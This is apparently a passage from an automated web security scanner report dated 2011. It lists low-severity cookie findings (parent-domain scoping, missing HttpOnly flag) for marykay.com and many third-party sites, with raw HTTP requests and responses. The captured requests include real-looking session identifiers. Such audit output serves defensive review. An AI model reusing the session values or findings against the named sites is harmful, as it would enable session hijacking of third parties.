HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:45:46 GMT Content-Type: text/html; charset=utf-8 Content-Language: en Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Set-Cookie: Subsidiary=US; path=/ Set-Cookie: PreviousMoniker=; path=/ Set-Cookie: Moniker=; path=/ Set-Cookie: ConsultantContactID=-9223372036854775808; path=/Set-Cookie: TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Vary: Accept-Encoding Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ Content-Length: 36830 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN" > <html> <head><meta name="title" content="Mary Kay... Find your way to beautiful!" /><link id="Link1" rel="image_src" href="http://w...[SNIP]...
12.100. http://www.marykay.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 318 Content-Type: image/x-icon Last-Modified: Wed, 06 Apr 2011 17:12:18 GMT Accept-Ranges: bytes ETag: "b9ed3c87df4cb1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:57 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/ ..............(.......(....... ....................................3...f...f...........................$...........\......m...wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwEwWtgEwFDu.rw4sWds%bwDDwtBtDwAGwt....[SNIP]...
12.101. http://www.marykay.com/images/fflogo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/fflogo.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/fflogo.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1665 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "8b6f46621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................J.....[SNIP]...
12.102. http://www.marykay.com/images/icn_ec.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_ec.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icn_ec.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1712 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "17d0446621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ..........................................................................................................$.Z.....[SNIP]...
12.103. http://www.marykay.com/images/icn_fb.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_fb.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icn_fb.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1769 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "bbc506621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ .PNG . ...IHDR...z...$........4....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<...{IDAThC.Z.oTE...mL0!.?@q%.*... H"./h.W..D..l..}hY.(R............D....1-,&m.~....g......Z......3gf................[SNIP]...
12.104. http://www.marykay.com/images/icn_pbp.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_pbp.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icn_pbp.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 2351 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "d380556621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ ......JFIF.....`.`.....4Exif..II*.......1...............Adobe ImageReady.....C........... . ................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222...[SNIP]...
12.105. http://www.marykay.com/images/icn_vmo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_vmo.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icn_vmo.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1933 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "8f31666621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ..........................................................................................................$.......[SNIP]...
12.106. http://www.marykay.com/images/icn_yt.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/icn_yt.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icn_yt.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 3367 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "7797e6621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ .PNG . ...IHDR.......$.....%..g....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<....IDAThC.ZyPU..O.n..E.Z.4...Z..2j..L HQ.L.&...d...hTp#U.......S.4..`*..Z1.7.....Ux..... ..=..}..<.F.=s..s.=.......[SNIP]...
12.107. http://www.marykay.com/images/ielogo.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/ielogo.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/ielogo.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1740 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:18:25 GMT Accept-Ranges: bytes ETag: "cf578c6621cc1:d826e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ............................................................................................................J.....[SNIP]...
12.108. http://www.marykay.com/images/searchbutton.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/images/searchbutton.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/searchbutton.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 239 Content-Type: image/gif Last-Modified: Wed, 06 Apr 2011 17:12:22 GMT Accept-Ranges: bytes ETag: "99f3fcca7df4cb1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ GIF89a......~OL~PN|ON...?++...............C.-@++B,,@,+~PL......|OL.ON.PO~ON....PN...........................!.......,.........l.d.V9.V...9...`t]...co..%Z.q..^4...1.|.....Mh.)...d. .T:m.(.,.|.$.l.$.....[SNIP]...
12.109. http://www.marykay.com/scripts/i2a.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/scripts/i2a.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/i2a.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1848 Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT Accept-Ranges: bytes ETag: "80e28bcc7df4cb1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ var io = new Image(); var pageAction, price, sku, order_code, currency_id, user_defined1, user_defined2, user_defined3, user_defined4, ic_cat, ic_bu, ic_bc, ic_ch, ic_nso, altid, ic_type, urlA, prefi...[SNIP]...
13. Cookie without HttpOnly flag set
previous
next
There are 262 instances of this issue:
http://afe.specificclick.net/
http://afe.specificclick.net/serve/v=5
http://blog.harbottle.com/dm/xmlrpc.php
http://convctr.overture.com/images/cc/cc.gif
http://data.cnbc.com/quotes
https://forums.oracle.com/forums/adfAuthentication
https://forums.oracle.com/forums/category.jspa
https://forums.oracle.com/forums/guestsettings!default.jspa
https://forums.oracle.com/forums/index.jspa
https://forums.oracle.com/forums/login!withRedirect.jspa
https://forums.oracle.com/forums/main.jspa
http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pixel.adsafeprotected.com/jspix
http://pixel.everesttech.net/1688/i
https://register.cnbc.com/forgotPassword.do
https://register.cnbc.com/memberCenter.do
https://register.cnbc.com/registerUser.do
http://search.oracle.com/search/search
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://ttwbs.channelintelligence.com/
http://www.atg.com/svc-common/script/propertyFunc.js.jsp
http://a.tribalfusion.com/displayAd.js
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
http://a.tribalfusion.com/z/i.cid
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**
http://ad.yieldmanager.com/pixel
http://ads.pointroll.com/PortalServe/
http://ads.rnmd.net/getAds
http://api.bizographics.com/v1/profile.redirect
http://api.twitter.com/1/statuses/user_timeline.json
http://b.scorecardresearch.com/b
http://c.statcounter.com/t.php
http://clk.fetchback.com/serve/fb/click
http://clk.fetchback.com/serve/fb/engmnt
http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G
http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL
http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO
http://d.ads.readwriteweb.com/ck.php
http://d.ads.readwriteweb.com/spc.php
http://d1.openx.org/ck.php
http://developers.facebook.com/plugins/
http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi
http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
http://imp.fetchback.com/serve/fb/adtag.js
http://imp.fetchback.com/serve/fb/imp
http://lct.salesforce.com/sfga.js
http://legolas.nexac.com/lgalt
https://login.cnbc.com/cas/logout
https://login.oracle.com/favicon.ico
https://login.oracle.com/mysso/signon.jsp
https://login.oracle.com/mysso/sso_loginui/b-bg.gif
https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
https://login.oracle.com/mysso/sso_loginui/loginStyling.css
https://login.oracle.com/mysso/sso_loginui/moc_lib.js
https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
https://login.oracle.com/mysso/sso_loginui/sso_check.js
https://login.oracle.com/mysso/sso_loginui/t-bg.gif
https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
https://login.oracle.com/oam/server/sso/auth_cred_submit
https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
http://m1215.ic-live.com/522/
http://m1460.ic-live.com/586/
http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
http://optimized-by.rubiconproject.com/a/dk.html
http://optimized-by.rubiconproject.com/a/dk.js
http://oracle.112.2o7.net/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
